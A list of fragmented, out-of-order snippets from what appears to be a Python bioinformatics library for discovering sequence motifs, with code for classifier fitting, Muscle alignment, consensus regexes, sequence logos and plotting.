"% (fr) txt.append(info) av = motives[cluster_id]['avg_pos'] st = motives[cluster_id]['std_pos'] info = ' -",
"motif del motives[j] success = True if success is False: break # TODO:",
"= time.time() scores = p.get() scores_items += scores d_time = time.time() - start_time",
"options.sequence_type = sequence_type options.ignore_lower_case = ignore_lower_case options.unit_name = units options.first_index = first_position if",
"[-1] * neg_data_matrix.shape[0] y = np.array(y) true_targets.append(y) data_matrix = vstack([pos_data_matrix, neg_data_matrix]) pred =",
"(time.time() - start_time)) logger.debug('Vectorizing') start_time = time.time() matrices = [] for i, p",
"1 if i != j: # find closest instance j from any instance",
"= [list(x) for x in zip(*seqs)] instances_seqrecord = [] for i, j in",
"self.estimator = multiprocess_fit( pos_seqs, neg_seqs, vectorizer=self.vectorizer, estimator=self.estimator, pos_block_size=self.pos_block_size, neg_block_size=self.neg_block_size, n_jobs=self.n_jobs) self.fit_decomposition(neg_seqs) return self",
"normed=0, facecolor='blue', alpha=0.3) plt.grid() plt.title(needle) plt.xlabel('Position') plt.ylabel('Num occurrences') if fname: plt.draw() figname =",
"= [] if motives: _, norm_cooccurence_mtx, distances = compute_cooccurence(motives) info = '### Summary:",
"')' return code_str def consensus_regex(trimmed_align_seqs, regex_th): \"\"\"consensus_regex.\"\"\" cluster = [] for h, align_seq",
"d_time, d_loc_time)) pool.close() pool.join() data_matrix = vstack(matrices) return data_matrix def multiprocess_fit(pos_iterable, neg_iterable, vectorizer=None,",
"multiprocess_subarray(iterable, vectorizer=None, estimator=None, min_subarray_size=5, max_subarray_size=10, block_size=100, n_jobs=-1): \"\"\"multiprocess_subarray.\"\"\" start_time = time.time() if n_jobs",
"= scale_stack_widths options.show_errorbars = error_bars if title: options.title = title if figure_label: options.logo_label",
"= time.time() pos_data_matrix = p.get() matrices += pos_data_matrix d_time = time.time() - start_time",
"= time.time() - loc_start_time size = pos_data_matrix.shape logger.debug('%d %s (%.2f secs) (delta: %.2f)'",
"subseq = (header, seq) subseqs.append(subseq) subarrays_items += subseqs return subarrays_items def multiprocess_subarray(iterable, vectorizer=None,",
"xs, ys def fit(self, scores): \"\"\"fit.\"\"\" if scores: xs, ys = self.ecdf(scores) popt,",
"logos[cluster_id] = (logo_image, logo_txt) return logos else: logger.warning( 'No logo to compute. Try",
"-4 self.b = 1 def ecdf(self, x): \"\"\"Empirical cumulative distribution function.\"\"\" xs =",
"haystack): \"\"\"occurrences.\"\"\" counts = sum(find_occurrences(needle, haystack)) size = len(haystack) return counts, float(counts) /",
"= SeqList(alist=instances, alphabet=alphabet) data = wbl.LogoData().from_seqs(motif_corebio) format = wbl.LogoFormat(data, self.options) if self.output_format ==",
"from scipy.sparse import vstack from eden.util.iterated_maximum_subarray import compute_max_subarrays_sequence from itertools import izip import",
"n.get() y += [-1] * neg_data_matrix.shape[0] y = np.array(y) true_targets.append(y) data_matrix = vstack([pos_data_matrix,",
"logo_txt.append(info) info = ' - consensus sequence: %s' % motif['consensus_seq'] logo_txt.append(info) info =",
"plt.figure(figsize=size) sigp = np.copy(sig) sigp[sigp < 0] = 0 plt.bar(range(len(sigp)), sigp, alpha=0.3, color='g')",
"return orig_header, score, begin, end, subseq def decompose(self, seqs=None, p_value=0.05): \"\"\"decomposition_scores.\"\"\" try: subarrays_items",
"fit(self, pos_seqs=None, neg_seqs=None): \"\"\"fit.\"\"\" try: self.estimator = multiprocess_fit( pos_seqs, neg_seqs, vectorizer=self.vectorizer, estimator=self.estimator, pos_block_size=self.pos_block_size,",
"computation, %d motives' % len(motives)) return motives def _identify_mergeable_clusters(self, motives, similarity_th=0.8): for i",
"pool.close() pool.join() return scores_items # ------------------------------------------------------------------------------ def _fasta_to_fasta(lines): seq = \"\" for line",
"[] for cluster_id in clusters: if len(clusters[cluster_id]) > 0: seqs = [s for",
"y = sigmoid(value, self.a, self.b) p_val = 1 - y return p_val def",
"enumerate(cluster.T): c = Counter(row) k = c.most_common() code = '' for i, row",
"title if figure_label: options.logo_label = figure_label options.show_xaxis = show_x_axis if x_label: options.xaxis_label =",
"\"\"\"extract_consensus.\"\"\" for id in motives: c_regex = consensus_regex(motives[id]['trimmed_align_seqs'], regex_th) counts, freq = occurrences(c_regex,",
"Muscle Alignment on sequences.\"\"\" def __init__(self, diags=False, maxiters=16, maxhours=None, # TODO: check if",
"\"\"\"save.\"\"\" joblib.dump(self, model_name, compress=1) def load(self, obj): \"\"\"load.\"\"\" self.__dict__.update(joblib.load(obj).__dict__) def fit(self, pos_seqs=None, neg_seqs=None):",
"float(score) loc = header.split('<loc>')[1] begin, end = loc.split(':') begin = int(begin) end =",
"for c in align_seq] concat_str = np.array(str_list, dtype=np.dtype('a')) cluster.append(concat_str) cluster = np.vstack(cluster) score",
"std_th=None): \"\"\"select_motives.\"\"\" orig_clusters = self.compute_clusters(seqs, p_value=p_value) motives = self.compute_motives( orig_clusters, min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size,",
"* 100) else: logger.warning( 'No motives to report. Try more permissive parameters.') txt",
"components p = self.compute_p_value(score) if p <= p_value: yield orig_header, begin, end, p,",
"cooccurence_mtx.copy() cooccurence_list = [] for i, row in enumerate(cooccurence_mtx): norm = row[i] if",
"options.xaxis_label = x_label options.show_yaxis = show_y_axis if y_label: options.yaxis_label = y_label options.yaxis_tic_interval =",
"trimmed_align_seqs = [] for h, align_seq in align_seqs: trimmed_align_seq = [a for i,",
"dict() for cluster_id in clusters: start_time = time.time() # align with muscle is_high_quality,",
"for pred, seq in zip(preds, subsequences): self.clusters[pred].append(seq) logger.debug('After clustering, %d motives' % len(self.clusters))",
"else: logger.debug('Warning: reverting to default values') logger.debug('ECDF fit on %d values' % (len(scores)))",
"sig = np.array(scores) if len(sig) != median_len: logger.debug('Length mismatch: %d != %d' %",
"= 'rna' color_scheme = 'classic' wb = Weblogo(output_format='png', sequence_type=alphabet, resolution=200, stacks_per_line=60, units='bits', color_scheme=color_scheme)",
"motives[j]['regex_seq'] ds = distances[(cluster_id, j)] info = ' - num co-occurences %d %s",
"values') logger.debug('ECDF fit on %d values' % (len(scores))) logger.debug('Optimal params: a:%.2f b:%.2f' %",
"std_th=None): \"\"\"quality_filter.\"\"\" _motives = dict() for cluster_id in motives: regex_seq = motives[cluster_id]['regex_seq'] counts,",
"logger.debug('After quality filter, %d motives' % len(_motives)) return _motives def select_motives(self, seqs=None, p_value=0.05,",
"end, subseq in self.decomposition_scores(seqs)] if scores: xs, ys = ecdf(scores) popt, pcov =",
"find_occurrences(needle, haystack): \"\"\"find_occurrences.\"\"\" for h, s in haystack: matches = re.findall(needle, s, overlapped=True)",
"import weblogolib as wbl from scipy.cluster.hierarchy import linkage import regex as re from",
"of occurrences of regex: %.2f' % (fr) txt.append(info) av = motives[cluster_id]['avg_pos'] st =",
"in sorted([(motives[i]['freq'], i) for i in motives], reverse=True): info = ' - %.2s",
"# update motives motives[i] = motif del motives[j] success = True if success",
"= np.hstack(true_targets) return preds, binary_preds, true_targets def serial_subarray(iterable, vectorizer=None, estimator=None, min_subarray_size=5, max_subarray_size=10): \"\"\"serial_subarray.\"\"\"",
"estimator=self.estimator, pos_block_size=self.pos_block_size, neg_block_size=self.neg_block_size, n_jobs=self.n_jobs) self.fit_decomposition(neg_seqs) return self except Exception as e: logger.debug('Failed iteration.",
"selected = c_i - c_j distances[(i, j)].append(selected) cooccurence_mtx = np.nan_to_num(cooccurence_mtx) orig_cooccurence_mtx = cooccurence_mtx.copy()",
"subarray['end'] score = subarray['score'] header = orig_header header += '<loc>%d:%d<loc>' % (begin, end)",
"= [] for i, (p, n) in enumerate(izip(pos_results, neg_results)): loc_start_time = time.time() pos_data_matrix",
"end, width)) for h, s in seqs: if s[start:end]: yield (h, s[start:end]) def",
"%d [%d is now #%d]' % \\ (j, i, n_i + n_j) logger.debug(info1",
"regex_th=regex_th) if l: code += l return code def find_occurrences(needle, haystack): \"\"\"find_occurrences.\"\"\" for",
"in motives: c_regex = consensus_regex(motives[id]['trimmed_align_seqs'], regex_th) counts, freq = occurrences(c_regex, seqs) yield freq,",
"sep = ' ' * (complexity * 2) # join all sequences in",
"cluster_id: regex_j = motives[j]['regex_seq'] ds = distances[(cluster_id, j)] info = ' - num",
"figname def mean_shift_decomposition(sig, half_windw_size=5): \"\"\"mean_shift_decomposition.\"\"\" sig_len = len(sig) for i in range(half_windw_size, sig_len",
"= '%s_importance.png' % (fname) plt.savefig( figname, bbox_inches='tight', transparent=True, pad_inches=0) else: figname = None",
"= 1 def ecdf(self, x): \"\"\"Empirical cumulative distribution function.\"\"\" xs = np.sort(x) ys",
"figname = plot_location( regex_i, all_seqs, cluster_id=cluster_id, nbins=nbins, size=size, fname=fname) txt.append(self._wrap_image(figname, output_type=output_type)) for j",
"%.1f' % (av, st) txt.append(info) txt.append(self._wrap_image(figname, fill_width=False, output_type=output_type)) regex_i = motives[cluster_id]['regex_seq'] figname =",
"= [] for i, j in enumerate(instances): instances_seqrecord.append( SeqRecord(Seq(j, self.alphabet), id=str(i))) handle =",
"min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size) motives = self.merge( motives, similarity_th=similarity_th, min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th,",
"def plot_cumulative_score(smod, seqs, size=(6, 2), fname=None): \"\"\"plot_cumulative_score.\"\"\" sig = cumulative_score(seqs, smod) plt.figure(figsize=size) sigp",
"% len(self.clusters)) return self.clusters except Exception as e: logger.debug('Failed iteration. Reason: %s' %",
"counts avg, std = extract_location(regex_seq, seqs) motives[cluster_id]['avg_pos'] = avg motives[cluster_id]['std_pos'] = std if",
"error_bars if title: options.title = title if figure_label: options.logo_label = figure_label options.show_xaxis =",
"estimator def multiprocess_performance(pos_iterable, neg_iterable, vectorizer=None, estimator=None, pos_block_size=100, neg_block_size=100, n_jobs=-1): \"\"\"multiprocess_performance.\"\"\" start_time = time.time()",
"compute_motives(self, clusters, min_score=4, min_freq=0.6, min_cluster_size=10, regex_th=.3, sample_size=200): \"\"\"compute_motives.\"\"\" if not clusters: raise Exception('Error:",
"def multiprocess_vectorize(iterable, vectorizer=None, pos_block_size=100, n_jobs=-1): \"\"\"multiprocess_vectorize.\"\"\" start_time = time.time() if n_jobs == -1:",
"p_value=0.05, similarity_th=0.5, min_score=4, min_freq=0.5, min_cluster_size=10, regex_th=.3, sample_size=200, freq_th=None, std_th=None): \"\"\"select_motives.\"\"\" orig_clusters = self.compute_clusters(seqs,",
"score >= min_score and len(align_seqs) > min_cluster_size: consensus_seq = self._compute_consensus_seq(trimmed_align_seqs) regex_seq = consensus_regex(trimmed_align_seqs,",
"predictor to learn the new class definition logger.debug('After merge, %d motives' % len(motives))",
"(i, n_i, j, n_j, rel_nw_score) info2 = ' deleting: %d [%d is now",
"logger.debug('%d %s (%.2f secs) (delta: %.2f)' % (i, size, d_time, d_loc_time)) pool.close() pool.join()",
"options.fineprint = fineprint self.options = options self.output_format = output_format def create_logo(self, seqs=[]): \"\"\"Create",
"None) and motives.get(j, None): n_i = len(motives[i]['seqs']) n_j = len(motives[j]['seqs']) seqs = motives[i]['seqs']",
"if seq: yield seq # ------------------------------------------------------------------------------ class MuscleAlignWrapper(object): \"\"\"A wrapper to perform Muscle",
"time.time() if n_jobs == -1: pool = mp.Pool() else: pool = mp.Pool(n_jobs) pos_results",
">= min_freq: score += 1 trimmed_align_seqs = [] for h, align_seq in align_seqs:",
"sample_size=200, freq_th=None, std_th=None): \"\"\"select_motives.\"\"\" orig_clusters = self.compute_clusters(seqs, p_value=p_value) motives = self.compute_motives( orig_clusters, min_score=min_score,",
"subsequences = [] iterable = self.decompose(seqs, p_value=p_value) for header, begin, end, p, subseq",
"d_ij = [] for c_i in centers[i]: for c_j in centers[j]: d_ij.append(abs(c_i -",
"ids: logo_image, logo_txt = self.compute_logo( cluster_id=cluster_id, motif=motives[cluster_id]) logos[cluster_id] = (logo_image, logo_txt) return logos",
"'%s_dist_%d_vs_%d.png' % (fname, cluster_id_i, cluster_id_j) plt.savefig( figname, bbox_inches='tight', transparent=True, pad_inches=0) else: figname =",
"val = k[1][1] else: val = k[0][1] if float(val) / dim >= min_freq:",
"c in align_seq] concat_str = np.array(str_list, dtype=np.dtype('a')) cluster.append(concat_str) cluster = np.vstack(cluster) score =",
"= np.nan_to_num(cooccurence_mtx) orig_cooccurence_mtx = cooccurence_mtx.copy() cooccurence_list = [] for i, row in enumerate(cooccurence_mtx):",
"size = pos_data_matrix.shape logger.debug('%d %s (%.2f secs) (delta: %.2f)' % (i, size, d_time,",
"# confusion matrix cm = metrics.confusion_matrix(y_test, y_binary) np.set_printoptions(precision=2) logger.info('Confusion matrix:') logger.info(cm) # classification",
"import regex as re from collections import Counter from sklearn import metrics from",
"seqs=None): \"\"\"fit.\"\"\" try: for score in multiprocess_score(seqs, vectorizer=self.vectorizer, estimator=self.estimator, block_size=self.pos_block_size, n_jobs=self.n_jobs): yield score",
"end = ids[i + 1] width = end - start val = sum(sig[start:end])",
"return False, None def compute_motives(self, clusters, min_score=4, min_freq=0.6, min_cluster_size=10, regex_th=.3, sample_size=200): \"\"\"compute_motives.\"\"\" if",
"* neg_data_matrix.shape[0] y = np.array(y) true_targets.append(y) data_matrix = vstack([pos_data_matrix, neg_data_matrix]) pred = estimator.decision_function(data_matrix)",
"figname def extract_location(needle, haystack): \"\"\"extract_location.\"\"\" locs = [] for h, s in haystack:",
"%s' % e) logger.debug('Exception', exc_info=True) def fit_decomposition(self, seqs=None): \"\"\"fit_decomposition.\"\"\" self.a, self.b = -4,",
"bins, patches = plt.hist( locs, nbins, normed=0, facecolor='blue', alpha=0.3) plt.grid() plt.title(needle) plt.xlabel('Position') plt.ylabel('Num",
"vectorizer)) for seqs in chunks(iterable, pos_block_size)] logger.debug('Setup %.2f secs' % (time.time() - start_time))",
"def performance(self, pos_seqs=None, neg_seqs=None): \"\"\"performance.\"\"\" try: y_pred, y_binary, y_test = multiprocess_performance( pos_seqs, neg_seqs,",
"= self._perform_ma(data) aligned_seqs = self._fasta_to_seqs(headers, stdout) return aligned_seqs # ------------------------------------------------------------------------------ class Weblogo(object): \"\"\"A",
"for cluster_id in clusters: start_time = time.time() # align with muscle is_high_quality, motif",
"SeqIO.write(instances_seqrecord, handle, \"fasta\") data = handle.getvalue() return headers, data def _perform_ma(self, data): params",
"logger.debug('%d (%.2f secs) (delta: %.2f)' % (i, d_time, d_loc_time)) pool.close() pool.join() return subarrays_items",
"(co) txt.append(info) info = ' - freq of occurrences of regex: %.2f' %",
"yield items def multiprocess_vectorize(iterable, vectorizer=None, pos_block_size=100, n_jobs=-1): \"\"\"multiprocess_vectorize.\"\"\" start_time = time.time() if n_jobs",
"enumerate(cluster.T): c = Counter(row) k = c.most_common() l = letter_regex(k, size, regex_th=regex_th) if",
"smod) plt.figure(figsize=size) sigp = np.copy(sig) sigp[sigp < 0] = 0 plt.bar(range(len(sigp)), sigp, alpha=0.3,",
"end - start val = sum(sig[start:end]) yield val, start, end, width def cumulative_score(seqs,",
"motives = self.quality_filter( seqs, motives, freq_th=freq_th, std_th=std_th) return motives def compute_logo(self, cluster_id=None, motif=None):",
"k = c.most_common() seq += k[0][0] return seq def _compute_score(self, align_seqs, min_freq=0.8): dim",
"(j, i, n_i + n_j) logger.debug(info1 + info2) # update motives motives[i] =",
"hits(motives, ids=ids): seqs_summary[seq_id].append((begin, end, i)) distances = defaultdict(list) size = max(id for id",
"sequence logo for input sequences.\"\"\" # seperate headers headers, instances = [list(x) for",
"half_windw_size): min_sig = np.min(sig[i - half_windw_size:i + half_windw_size]) if min_sig == sig[i]: yield",
"= subarray['subarray_string'] begin = subarray['begin'] end = subarray['end'] score = subarray['score'] header =",
"= np.array(str_list, dtype=np.dtype('a')) cluster.append(concat_str) cluster = np.vstack(cluster) score = 0 to_be_removed = []",
"pos_block_size=100, neg_block_size=100, n_jobs=-1): \"\"\"multiprocess_fit.\"\"\" start_time = time.time() classes = np.array([1, -1]) if n_jobs",
"dtime = time.time() - start_time logger.debug('...done in %.2f secs' % (dtime)) self.clusters =",
"min_freq=0.6, min_cluster_size=10, regex_th=.3, sample_size=200): \"\"\"compute_motives.\"\"\" if not clusters: raise Exception('Error: No clusters.') mcs",
"i d_ij = [] for c_i in centers[i]: for c_j in centers[j]: d_ij.append(abs(c_i",
"\"\"\"multiprocess_performance.\"\"\" start_time = time.time() if n_jobs == -1: pool = mp.Pool() else: pool",
"= iter(iterable) while True: items = [] for i in range(n): it =",
"(complexity * 2) # join all sequences in a cluster with enough space",
"start_time = time.time() preds = [] binary_preds = [] true_targets = [] for",
"freq_th=freq_th, std_th=std_th) return motives def compute_logo(self, cluster_id=None, motif=None): \"\"\"compute_logo.\"\"\" alphabet = 'rna' color_scheme",
"for c in align_seq] concat_str = np.array(str_list, dtype=np.dtype('a')) cluster.append(concat_str) cluster = np.vstack(cluster) size",
"alphabet=alphabet) data = wbl.LogoData().from_seqs(motif_corebio) format = wbl.LogoFormat(data, self.options) if self.output_format == 'png': return",
"'protein'] ): \"\"\"Initialize an instance.\"\"\" self.diags = diags self.maxiters = maxiters self.maxhours =",
"f: f.write(logo) return imagename def _wrap_image(self, fname, fill_width=True, output_type='screen'): pwd = os.getcwd() url",
"== 'pdf': txt.append('<p align=\"left\"><img src=\"file://' + url + '\"></p>') else: txt.append('<p align=\"left\"><img src=\"'",
"for i, j in enumerate(instances): instances_seqrecord.append( SeqRecord(Seq(j, self.alphabet), id=str(i))) handle = StringIO() SeqIO.write(instances_seqrecord,",
"i in ids: for h, s in motives[i]['seqs']: tokens = h.split('<loc>') seq_id =",
"multiprocess_vectorize(iterable, vectorizer=None, pos_block_size=100, n_jobs=-1): \"\"\"multiprocess_vectorize.\"\"\" start_time = time.time() if n_jobs == -1: pool",
"* nw_score / (len(seq_i) + len(seq_j)) if rel_nw_score > similarity_th: yield rel_nw_score, i,",
"cluster_id in clusters: start_time = time.time() # align with muscle is_high_quality, motif =",
"edit_distance import random import pylab as plt import joblib from scipy.optimize import curve_fit",
"1) / float(len(xs)) return xs, ys def letter_regex(k, size, regex_th=0.3): \"\"\"letter_regex.\"\"\" code =",
"_wrap_image(self, fname, fill_width=True, output_type='screen'): pwd = os.getcwd() url = pwd + '/' +",
"logger.debug('Clustering') logger.debug('working on %d instances' % data_matrix.shape[0]) start_time = time.time() self.clusterer.set_params(n_clusters=self.n_clusters) if self.clusterer_is_fit:",
"seqs=None, motives=None, freq_th=None, std_th=None): \"\"\"quality_filter.\"\"\" _motives = dict() for cluster_id in motives: regex_seq",
"is too strict. Ignoring filter.') return motives else: logger.debug('After quality filter, %d motives'",
"ds = distances[(cluster_id_i, cluster_id_j)] plt.figure(figsize=size) n, bins, patches = plt.hist( ds, nbins, normed=0,",
"median_len: sigs = sigs + sig[:median_len] sig = np.array(sigs) / float(len(seqs)) return sig",
"+ sig[:median_len] sig = np.array(sigs) / float(len(seqs)) return sig def trim_seqs(seqs, smod, half_windw_size=7):",
"[] iterable = self.decompose(seqs, p_value=p_value) for header, begin, end, p, subseq in iterable:",
"def serial_score(iterable, vectorizer=None, estimator=None): \"\"\"serial_score.\"\"\" annotated_seqs = vectorizer.annotate(iterable, estimator=estimator) scores = [score for",
"\"\"\"plot_location.\"\"\" locs = [] for h, s in haystack: for match in re.finditer(needle,",
"def fit(self, pos_seqs=None, neg_seqs=None): \"\"\"fit.\"\"\" try: self.estimator = multiprocess_fit( pos_seqs, neg_seqs, vectorizer=self.vectorizer, estimator=self.estimator,",
"j)].append(selected) cooccurence_mtx = np.nan_to_num(cooccurence_mtx) orig_cooccurence_mtx = cooccurence_mtx.copy() cooccurence_list = [] for i, row",
"regex_seq = motives[cluster_id]['regex_seq'] counts, freq = occurrences(regex_seq, seqs) motives[cluster_id]['freq'] = freq motives[cluster_id]['counts'] =",
"'align_seqs': align_seqs, 'seqs': seqs} return True, motif else: return False, None def compute_motives(self,",
"= pwd + '/' + fname txt = [] if fill_width: if output_type",
"plot_cumulative_score( self, pos_seqs, size=size, fname=fname) txt.append(self._wrap_image(figname, output_type=output_type)) for freq, cluster_id in sorted([(motives[i]['freq'], i)",
"show_ends options.color_scheme = wbl.std_color_schemes[color_scheme] options.resolution = resolution if fineprint: options.fineprint = fineprint self.options",
"self.output_format == 'jpeg': return wbl.jpeg_formatter(data, format) else: return wbl.eps_formatter(data, format) # ------------------------------------------------------------------------------ class",
"Exception('Error: No clusters.') mcs = min_cluster_size logger.debug('Alignment') motives = dict() for cluster_id in",
"options.show_xaxis = show_x_axis if x_label: options.xaxis_label = x_label options.show_yaxis = show_y_axis if y_label:",
"not None: params['maxhours'] = self.maxhours muscle_cline = MuscleCommandline(**params) stdout, stderr = muscle_cline(stdin=data) return",
"StringIO() SeqIO.write(instances_seqrecord, handle, \"fasta\") data = handle.getvalue() return headers, data def _perform_ma(self, data):",
"from eden.sequence import Vectorizer from StringIO import StringIO from Bio import SeqIO from",
"header, seq in subarrays_items: yield self._decompose_header(header) except Exception as e: logger.debug('Failed iteration. Reason:",
"size=(6, 2), fname=None): \"\"\"plot_distance.\"\"\" ds = distances[(cluster_id_i, cluster_id_j)] plt.figure(figsize=size) n, bins, patches =",
"orig_header, score, begin, end, subseq def decompose(self, seqs=None, p_value=0.05): \"\"\"decomposition_scores.\"\"\" try: subarrays_items =",
"logger.debug('After motives computation, %d motives' % len(motives)) return motives def _identify_mergeable_clusters(self, motives, similarity_th=0.8):",
"'rna' color_scheme = 'classic' wb = Weblogo(output_format='png', sequence_type=alphabet, resolution=200, stacks_per_line=60, units='bits', color_scheme=color_scheme) logo_image",
"true_targets def serial_subarray(iterable, vectorizer=None, estimator=None, min_subarray_size=5, max_subarray_size=10): \"\"\"serial_subarray.\"\"\" annotated_seqs = vectorizer.annotate(iterable, estimator=estimator) subarrays_items",
"maxiters self.maxhours = maxhours if alphabet == 'protein': self.alphabet = IUPAC.protein elif alphabet",
"else: figname = None plt.show() plt.close() return figname # ------------------------------------------------------------------------------ def serial_pre_process(iterable, vectorizer=None):",
"= x_label options.show_yaxis = show_y_axis if y_label: options.yaxis_label = y_label options.yaxis_tic_interval = y_axis_tic_spacing",
"binary_preds.append(binary_pred) d_time = time.time() - start_time d_loc_time = time.time() - loc_start_time size =",
"_seq_to_stdin_fasta(self, seqs): # seperating headers headers, instances = [list(x) for x in zip(*seqs)]",
"sample_seqs = random.sample(seqs, sample_size) else: sample_seqs = seqs align_seqs = ma.transform(seqs=sample_seqs) score, trimmed_align_seqs",
"= pos_block_size self.neg_block_size = neg_block_size self.n_jobs = n_jobs self.vectorizer = Vectorizer(complexity=complexity, auto_weights=True, nbits=15)",
"+ ')' return code_str def consensus_regex(trimmed_align_seqs, regex_th): \"\"\"consensus_regex.\"\"\" cluster = [] for h,",
"np.array(sigs) / float(len(seqs)) return sig def trim_seqs(seqs, smod, half_windw_size=7): \"\"\"trim_seqs.\"\"\" sig = cumulative_score(seqs,",
"val, start, end, width = max(box_decomposition(sig, half_windw_size)) logger.debug('val:%.1f beg:%s end:%s width:%s' % (val,",
"curve_fit import multiprocessing logger = logging.getLogger(__name__) def sigmoid(x, a, b): \"\"\"sigmoid.\"\"\" return 1",
"else: pool = mp.Pool(n_jobs) results = [apply_async( pool, serial_pre_process, args=(seqs, vectorizer)) for seqs",
"class Weblogo(object): \"\"\"A wrapper of weblogolib for creating sequence.\"\"\" def __init__(self, output_format='png', #",
"+= pos_data_matrix d_time = time.time() - start_time d_loc_time = time.time() - loc_start_time size",
"= mp.Pool(n_jobs) results = [apply_async( pool, serial_subarray, args=(seqs, vectorizer, estimator, min_subarray_size, max_subarray_size)) for",
"seq in subarrays_items: components = self._decompose_header(header) orig_header, score, begin, end, subseq = components",
"estimator.partial_fit(data_matrix, y, classes=classes) d_time = time.time() - start_time d_loc_time = time.time() - loc_start_time",
"norm = row[i] if norm != 0: row /= norm else: row =",
"seq in subarrays_items: yield self._decompose_header(header) except Exception as e: logger.debug('Failed iteration. Reason: %s'",
"'pdf': txt.append('<p align=\"left\"><img src=\"file://' + url + '\"></p>') else: txt.append('<p align=\"left\"><img src=\"' +",
"on %d values' % (len(scores))) logger.debug('Optimal params: a:%.2f b:%.2f' % (self.a, self.b)) def",
"motives: for j in motives: if j > i: seq_i = motives[i]['consensus_seq'] seq_j",
"ys) self.a, self.b = popt else: logger.debug('Warning: reverting to default values') logger.debug('ECDF fit",
"True, motif else: return False, None def compute_motives(self, clusters, min_score=4, min_freq=0.6, min_cluster_size=10, regex_th=.3,",
"= dict() for cluster_id in motives: regex_seq = motives[cluster_id]['regex_seq'] counts, freq = occurrences(regex_seq,",
"'Joining: %d (#%d), %d (#%d) score: %.2f' % \\ (i, n_i, j, n_j,",
"= np.array(scores) if len(sig) != median_len: logger.debug('Length mismatch: %d != %d' % (len(sig),",
"results = [apply_async( pool, serial_score, args=(seqs, vectorizer, estimator)) for seqs in chunks(iterable, block_size)]",
"% (len(scores))) logger.debug('Optimal params: a:%.2f b:%.2f' % (self.a, self.b)) def predict(self, value): \"\"\"pvalue.\"\"\"",
"motif=None): \"\"\"compute_logo.\"\"\" alphabet = 'rna' color_scheme = 'classic' wb = Weblogo(output_format='png', sequence_type=alphabet, resolution=200,",
"len(ds)) txt.append(info) if len(ds): figname = plot_distance( cluster_id, j, regex_i, regex_j, distances, nbins=nbins,",
"= [] for subarray in subarrays: subseq_seq = subarray['subarray_string'] begin = subarray['begin'] end",
"popt, pcov = curve_fit(sigmoid, xs, ys) self.a, self.b = popt else: logger.debug('Warning: reverting",
"motives' % len(self.clusters)) return self.clusters except Exception as e: logger.debug('Failed iteration. Reason: %s'",
"e: logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True) def fit_decomposition(self, seqs=None): \"\"\"fit_decomposition.\"\"\"",
"estimator=None, pos_block_size=100, neg_block_size=100, n_jobs=-1): \"\"\"multiprocess_performance.\"\"\" start_time = time.time() if n_jobs == -1: pool",
"p_val def compute_clusters(self, seqs=None, p_value=0.05): \"\"\"compute_clusters.\"\"\" try: subsequences = [] iterable = self.decompose(seqs,",
"headers, data def _perform_ma(self, data): params = {'maxiters': 7} if self.diags is True:",
"sigp = np.copy(sig) sigp[sigp < 0] = 0 plt.bar(range(len(sigp)), sigp, alpha=0.3, color='g') sign",
"matrices += pos_data_matrix d_time = time.time() - start_time d_loc_time = time.time() - loc_start_time",
"i) def compute_cooccurence(motives, ids=None): \"\"\"compute_cooccurence.\"\"\" if ids is None: ids = [id for",
"else: yield 0 def occurrences(needle, haystack): \"\"\"occurrences.\"\"\" counts = sum(find_occurrences(needle, haystack)) size =",
"score) in zip(iterable, annotated_seqs): subarrays = compute_max_subarrays_sequence( seq=seq, score=score, min_subarray_size=min_subarray_size, max_subarray_size=max_subarray_size, margin=1, output='all')",
"1] return zip(headers, motif_seqs) def transform(self, seqs=[]): \"\"\"Carry out alignment.\"\"\" headers, data =",
"imagename = '%s_logo_cl_%d.png' % (fname, cluster_id) with open(imagename, 'wb') as f: f.write(logo) return",
"yield (seq_id, int(begin), int(end), i) def compute_cooccurence(motives, ids=None): \"\"\"compute_cooccurence.\"\"\" if ids is None:",
"\"\"\"box_decomposition.\"\"\" ids = list(mean_shift_decomposition(sig, half_windw_size)) for i in range(len(ids) - 1): start =",
"0 plt.bar(range(len(sign)), sign, alpha=0.3, color='r') plt.grid() plt.xlabel('Position') plt.ylabel('Importance score') if fname: plt.draw() figname",
"[score for seq, score in annotated_seqs] return scores def multiprocess_score(iterable, vectorizer=None, estimator=None, block_size=100,",
"method='single') orders = [] for id1, id2 in c[:, 0:2]: if id1 <",
"logo_range[1] options.scale_width = scale_stack_widths options.show_errorbars = error_bars if title: options.title = title if",
"= k[1][1] else: val = k[0][1] if float(val) / dim >= min_freq: score",
"np.vstack(cluster) seq = '' for i, row in enumerate(cluster.T): c = Counter(row) k",
"max_subarray_size)) for seqs in chunks(iterable, block_size)] logger.debug('Setup %.2f secs' % (time.time() - start_time))",
"if j != cluster_id: regex_j = motives[j]['regex_seq'] ds = distances[(cluster_id, j)] info =",
"serial_subarray(iterable, vectorizer=None, estimator=None, min_subarray_size=5, max_subarray_size=10): \"\"\"serial_subarray.\"\"\" annotated_seqs = vectorizer.annotate(iterable, estimator=estimator) subarrays_items = []",
"loc_start_time = time.time() scores = p.get() scores_items += scores d_time = time.time() -",
"i) for i in motives], reverse=True): info = ' - %.2s %s' %",
"time.time() if n_jobs == -1: pool = mp.Pool() else: pool = mp.Pool(n_jobs) results",
"subarrays: subseq_seq = subarray['subarray_string'] begin = subarray['begin'] end = subarray['end'] score = subarray['score']",
"\"\"\"trim_seqs.\"\"\" sig = cumulative_score(seqs, smod) val, start, end, width = max(box_decomposition(sig, half_windw_size)) logger.debug('val:%.1f",
"self.clusterer_is_fit = True dtime = time.time() - start_time logger.debug('...done in %.2f secs' %",
"= [1] * pos_data_matrix.shape[0] neg_data_matrix = n.get() y += [-1] * neg_data_matrix.shape[0] y",
"seqs=[]): \"\"\"Create sequence logo for input sequences.\"\"\" # seperate headers headers, instances =",
"scale_stack_widths=True, error_bars=True, title='', figure_label='', show_x_axis=True, x_label='', show_y_axis=True, y_label='', y_axis_tic_spacing=1.0, show_ends=False, # ['auto','base','pairing','charge','chemistry','classic','monochrome'] color_scheme='classic',",
"------------------------------------------------------------------------------ class SequenceMotifDecomposer(BaseEstimator, ClassifierMixin): \"\"\"SequenceMotifDecomposer.\"\"\" def __init__(self, complexity=5, n_clusters=10, min_subarray_size=4, max_subarray_size=10, estimator=SGDClassifier(warm_start=True), class_estimator=SGDClassifier(),",
"i, row in enumerate(cluster.T): c = Counter(row) k = c.most_common() seq += k[0][0]",
